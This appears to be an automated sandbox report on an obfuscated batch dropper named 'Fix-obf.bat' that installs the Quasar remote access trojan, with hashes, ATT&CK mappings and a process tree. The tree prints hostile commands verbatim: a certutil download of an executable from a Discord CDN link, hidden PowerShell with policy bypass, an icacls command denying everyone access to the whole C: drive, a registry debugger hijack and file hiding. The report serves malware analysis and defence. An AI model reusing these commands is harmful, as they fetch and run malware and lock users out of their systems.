quasar | 56dc2b78268152ae625035e026b5e43c269c9e440cbe1015f840200ee2cd4d6a

Analysis

max time kernel
25s
max time network
28s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
12-05-2024 19:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Fix-obf.bat
Size

24KB
MD5

f5309c94ee64f81d31a70a0f40e94cf9
SHA1

906f9f8557ccaef4d911d4274384493bfcc07c8f
SHA256

56dc2b78268152ae625035e026b5e43c269c9e440cbe1015f840200ee2cd4d6a
SHA512

0a58546adab1abebd91c294c127e655db059559a385d26d495ee945caa071fbe878c80dc8269afca2baaa93477cbbeef496a293caac6ac1d88016f7a51756de2
SSDEEP

384:UH02YgJBHbbQzpSLXNR8uWc5wu+ChsaguUvT27jxixHlLQ1vyk0dC:OyQHbbmpK9muWc5wu+ChstuUvyhi7k3

Score

10^/10

quasar discovery execution spyware trojan

Malware Config

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000e00000002336c-18.dat	family_quasar
behavioral2/memory/2936-25-0x00000000004A0000-0x0000000000E62000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5064	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Client-built-protected.exe

Executes dropped EXE 3 IoCs

pid	Process
5064	powershell.exe
2936	Client-built-protected.exe
2548	Client-built-protected.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3268	icacls.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2920	PING.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2936	Client-built-protected.exe
Token: SeDebugPrivilege	2548	Client-built-protected.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 856 wrote to memory of 4864	856	cmd.exe	83
PID 856 wrote to memory of 4864	856	cmd.exe	83
PID 856 wrote to memory of 3740	856	cmd.exe	84
PID 856 wrote to memory of 3740	856	cmd.exe	84
PID 856 wrote to memory of 4780	856	cmd.exe	85
PID 856 wrote to memory of 4780	856	cmd.exe	85
PID 856 wrote to memory of 1172	856	cmd.exe	86
PID 856 wrote to memory of 1172	856	cmd.exe	86
PID 856 wrote to memory of 2692	856	cmd.exe	87
PID 856 wrote to memory of 2692	856	cmd.exe	87
PID 856 wrote to memory of 3484	856	cmd.exe	88
PID 856 wrote to memory of 3484	856	cmd.exe	88
PID 856 wrote to memory of 4568	856	cmd.exe	89
PID 856 wrote to memory of 4568	856	cmd.exe	89
PID 856 wrote to memory of 1968	856	cmd.exe	90
PID 856 wrote to memory of 1968	856	cmd.exe	90
PID 856 wrote to memory of 4044	856	cmd.exe	91
PID 856 wrote to memory of 4044	856	cmd.exe	91
PID 856 wrote to memory of 1656	856	cmd.exe	92
PID 856 wrote to memory of 1656	856	cmd.exe	92
PID 856 wrote to memory of 5064	856	cmd.exe	97
PID 856 wrote to memory of 5064	856	cmd.exe	97
PID 856 wrote to memory of 5064	856	cmd.exe	97
PID 5064 wrote to memory of 2936	5064	powershell.exe	99
PID 5064 wrote to memory of 2936	5064	powershell.exe	99
PID 856 wrote to memory of 3268	856	cmd.exe	101
PID 856 wrote to memory of 3268	856	cmd.exe	101
PID 856 wrote to memory of 4248	856	cmd.exe	102
PID 856 wrote to memory of 4248	856	cmd.exe	102
PID 856 wrote to memory of 2860	856	cmd.exe	103
PID 856 wrote to memory of 2860	856	cmd.exe	103
PID 2936 wrote to memory of 1000	2936	Client-built-protected.exe	104
PID 2936 wrote to memory of 1000	2936	Client-built-protected.exe	104
PID 1000 wrote to memory of 4408	1000	cmd.exe	106
PID 1000 wrote to memory of 4408	1000	cmd.exe	106
PID 1000 wrote to memory of 2920	1000	cmd.exe	107
PID 1000 wrote to memory of 2920	1000	cmd.exe	107
PID 1000 wrote to memory of 2548	1000	cmd.exe	108
PID 1000 wrote to memory of 2548	1000	cmd.exe	108

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2860	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:856
- C:\Windows\system32\chcp.com
  chcp.com 437
  2⤵
  PID:4864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:3740
- C:\Windows\system32\find.exe
  fiNd
  2⤵
  PID:4780
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:1172
- C:\Windows\system32\findstr.exe
  fIndstr /L /I set C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat
  2⤵
  PID:2692
- C:\Windows\system32\findstr.exe
  fIndstr /L /I goto C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat
  2⤵
  PID:3484
- C:\Windows\system32\findstr.exe
  fIndstr /L /I echo C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat
  2⤵
  PID:4568
- C:\Windows\system32\findstr.exe
  fIndstr /L /I pause C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat
  2⤵
  PID:1968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:4044
- C:\Windows\system32\certutil.exe
  certutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1226567617460834426/1239292701342568478/powershell.exe?ex=664264c4&is=66411344&hm=fcd37859de3b6c8829472934914951187ed8f6f60ab3b241cc31cc1496709620&" powershell.exe
  2⤵
  PID:1656
- C:\Users\Admin\AppData\Local\Temp\powershell.exe
  powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'powershell.exe' -Verb RunAs"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5064
- - C:\Users\Admin\AppData\Local\Temp\Client-built-protected.exe
    "C:\Users\Admin\AppData\Local\Temp\Client-built-protected.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\emGc8vpy9QYO.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1000
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4408
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        Runs ping.exe
        
        PID:2920
    - - C:\Users\Admin\AppData\Local\Temp\Client-built-protected.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client-built-protected.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
- C:\Windows\system32\icacls.exe
  icacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T
  2⤵
  - Modifies file permissions
  PID:3268
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
  2⤵
  PID:4248
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\Temp\Fix-obf.bat"
  2⤵
  - Views/modifies file attributes
  PID:2860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client-built-protected.exe.log

Filesize
2KB

MD5
8f0271a63446aef01cf2bfc7b7c7976b

SHA1
b70dad968e1dda14b55ad361b7fd4ef9ab6c06d7

SHA256
da740d78ae00b72cb3710d1a1256dc6431550965d20afaa65e5d5860a4748e8c

SHA512
78a403c69f1284b7dd41527019f3eede3512a5e4d439d846eca83557b741ca37bcf56c412f3e577b9dd4cfa5a6d6210961215f14cb271b143f6eb94f69389cf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client-built-protected.exe

Filesize
9.7MB

MD5
65eec69db9c4307091f083bda41eee41

SHA1
1bd546ca74734565dbd5186e84a797a8d3598126

SHA256
f6c8f94e2492ec47cc46a2845cb596b4a318cba4a546bbfb8b6b4df4d073a878

SHA512
268712a46cecdd14a4b47b705aa8adbf8d81534d54e25d4bd819aac18ddcd4cc4f9d2b4ee29754185c4b0cabbe893ae9d2cdc97bba2e7ff7097e28ba18c91cad

Download Submit
C:\Users\Admin\AppData\Local\Temp\emGc8vpy9QYO.bat

Filesize
219B

MD5
56578afd0eaecf00b742b5ac631084b6

SHA1
1448680b6cc373960eac337def69884fdf6d9521

SHA256
ddef9924d0b4dcbef9510aa409be1c127e6b1672820ebc67c7207b8b68cb8ab5

SHA512
256166a40e50a122d416ebb5ac7ca09a282b5d660c305483467f61544f937426deabdc60dd22bc94af91206fe636f1b02eab1b2c910e6709531215721264d334

Download Submit
C:\Users\Admin\AppData\Local\Temp\powershell.exe

Filesize
9.7MB

MD5
8a2cfa3d50cdae74c192a6f24fcb1eea

SHA1
e703dc2b5b7f5649dc0ec2e95675777185af6070

SHA256
e90463a2ced2b7fe89a803b631b70c22cdf6e2c8ab13c7c6bdce81b2d214d4d4

SHA512
6a185174d96234f07d937790ddf0cd6cc835b01f2c60e43fe28b079bec984a5f488224e4b3f44cff8ac5553e639b8435af738346cedd08dd6e27df120b4aa663

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp

Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
memory/2936-25-0x00000000004A0000-0x0000000000E62000-memory.dmp

Filesize
9.8MB

Download
memory/2936-26-0x000000001BA00000-0x000000001BA50000-memory.dmp

Filesize
320KB

Download
memory/2936-27-0x000000001BD90000-0x000000001BE42000-memory.dmp

Filesize
712KB

Download